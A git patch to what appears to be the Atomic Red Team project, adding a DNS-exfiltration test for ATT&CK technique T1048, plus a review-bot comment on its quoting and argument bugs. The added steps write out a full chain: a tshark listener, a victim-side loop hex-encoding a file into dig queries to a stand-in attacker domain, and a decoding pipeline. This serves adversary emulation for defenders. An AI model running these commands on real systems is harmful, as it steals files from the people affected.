From 5b61194689a8dc6de6e244ef19e0f895f43f910e Mon Sep 17 00:00:00 2001
From: Sharath Unni
Date: Tue, 10 Mar 2020 19:08:02 -0400
Subject: [PATCH] T1048 exfiltration over dns (#831)
* added-dns-exfiltration Exfiltration over DNS
* Update T1048.md
Co-authored-by: Carrie Roberts
---
 atomics/T1048/T1048.md | 38 ++++++++++++++++++++++++++++++++++++++
 atomics/T1048/T1048.yaml | 37 +++++++++++++++++++++++++++++++++++++
 2 files changed, 75 insertions(+)
diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md
index 29d71766..3d4ceabb 100644
--- a/atomics/T1048/T1048.md
+++ b/atomics/T1048/T1048.md
@@ -23,6 +23,7 @@ Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)
 - [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
+- [Atomic Test #4 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)
@@ -137,4 +138,41 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
+
+
+## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
+Exfiltration of specified file using DNS. A domain name (example.com) and a hosting server is required. In your domain control panel, configure the below DNS settings:
+
+a) Create an A record ns1.example.com that points to the server IP.
+
+b) Set the NS record (ns2.example.com) to point to the server (ns1.example.com).
+
+**Supported Platforms:** Linux
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| domain | target DNS domain | url | ns2.example.com|
+| input_file | Path to file to be exfiltrated. | Path | ./example.txt|
+| output_file | Filename of the data exfiltrated | string | received_data.txt|
+
+
+#### Adversary machine: Run with `sh`!
+
+1. On the adversary machine run the below command.
+
+tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+
+#### Attack Commands: Run with `sh`!
+
+2. On the victim machine run the below commands.
+
+xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+#### Recover data by running the below commands. Run with `sh`!
+
+3. Once the data is received, use the below command to recover the data.
+
+cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
+
diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml
index e014d2cd..1d512242 100644
--- a/atomics/T1048/T1048.yaml
+++ b/atomics/T1048/T1048.yaml
@@ -110,3 +110,40 @@ atomic_tests:
 elevation_required: false
 command: |
 $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
+
+
+- name: Exfiltration Over Alternative Protocol - DNS
+ description: |
+ Exfiltration of specified file over DNS protocol.
+
+ supported_platforms:
+ - linux
+
+ input_arguments:
+ domain:
+ description: target DNS domain
+ type: url
+ default: ns2.example.com
+ input_file:
+ description: Path to file to be exfiltrated.
+ type: Path
+ default: ./example.txt
+ output_file:
+ description: Filename of the data exfiltrated.
+ type: String
+ default: received_data.txt
+
+ executor:
+ name: manual
+ steps: |
+ 1. On the adversary machine run the below command.
+
+ tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt
+
+ 2. On the victim machine run the below commands.
+
+ xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
+
+ 3. Once the data is received, use the below command to recover the data.
+
+ cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
\ No newline at end of file
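Review bot: The new manual steps reference the declared inputs as bare `input_file`, `.domain` and `output_file` rather than the `#{input_file}` / `#{domain}` / `#{output_file}` interpolation form the preceding test in this file uses (`-Path #{input_file}`, `"#{ip_address}"`), and step 1 hard-codes `received_data.txt` although an `output_file` argument is declared for it, so none of the arguments is actually substituted. The `-Y` display filter in step 1 also nests unescaped double quotes (`matches ".domain"`), which terminates the shell string early; single-quoting the filter, `-Y 'dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches "#{domain}"'`, keeps it intact. The YAML `description` is a single sentence while the T1048.md hunk in this commit carries the A/NS-record prerequisites; since the markdown is presumably generated from this YAML, that setup text belongs in the `description` here so the two cannot drift apart. The markdown hunk additionally labels the new table-of-contents entry `Atomic Test #4` and links it to the `...---icmp` anchor, although the section it introduces is `Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS`.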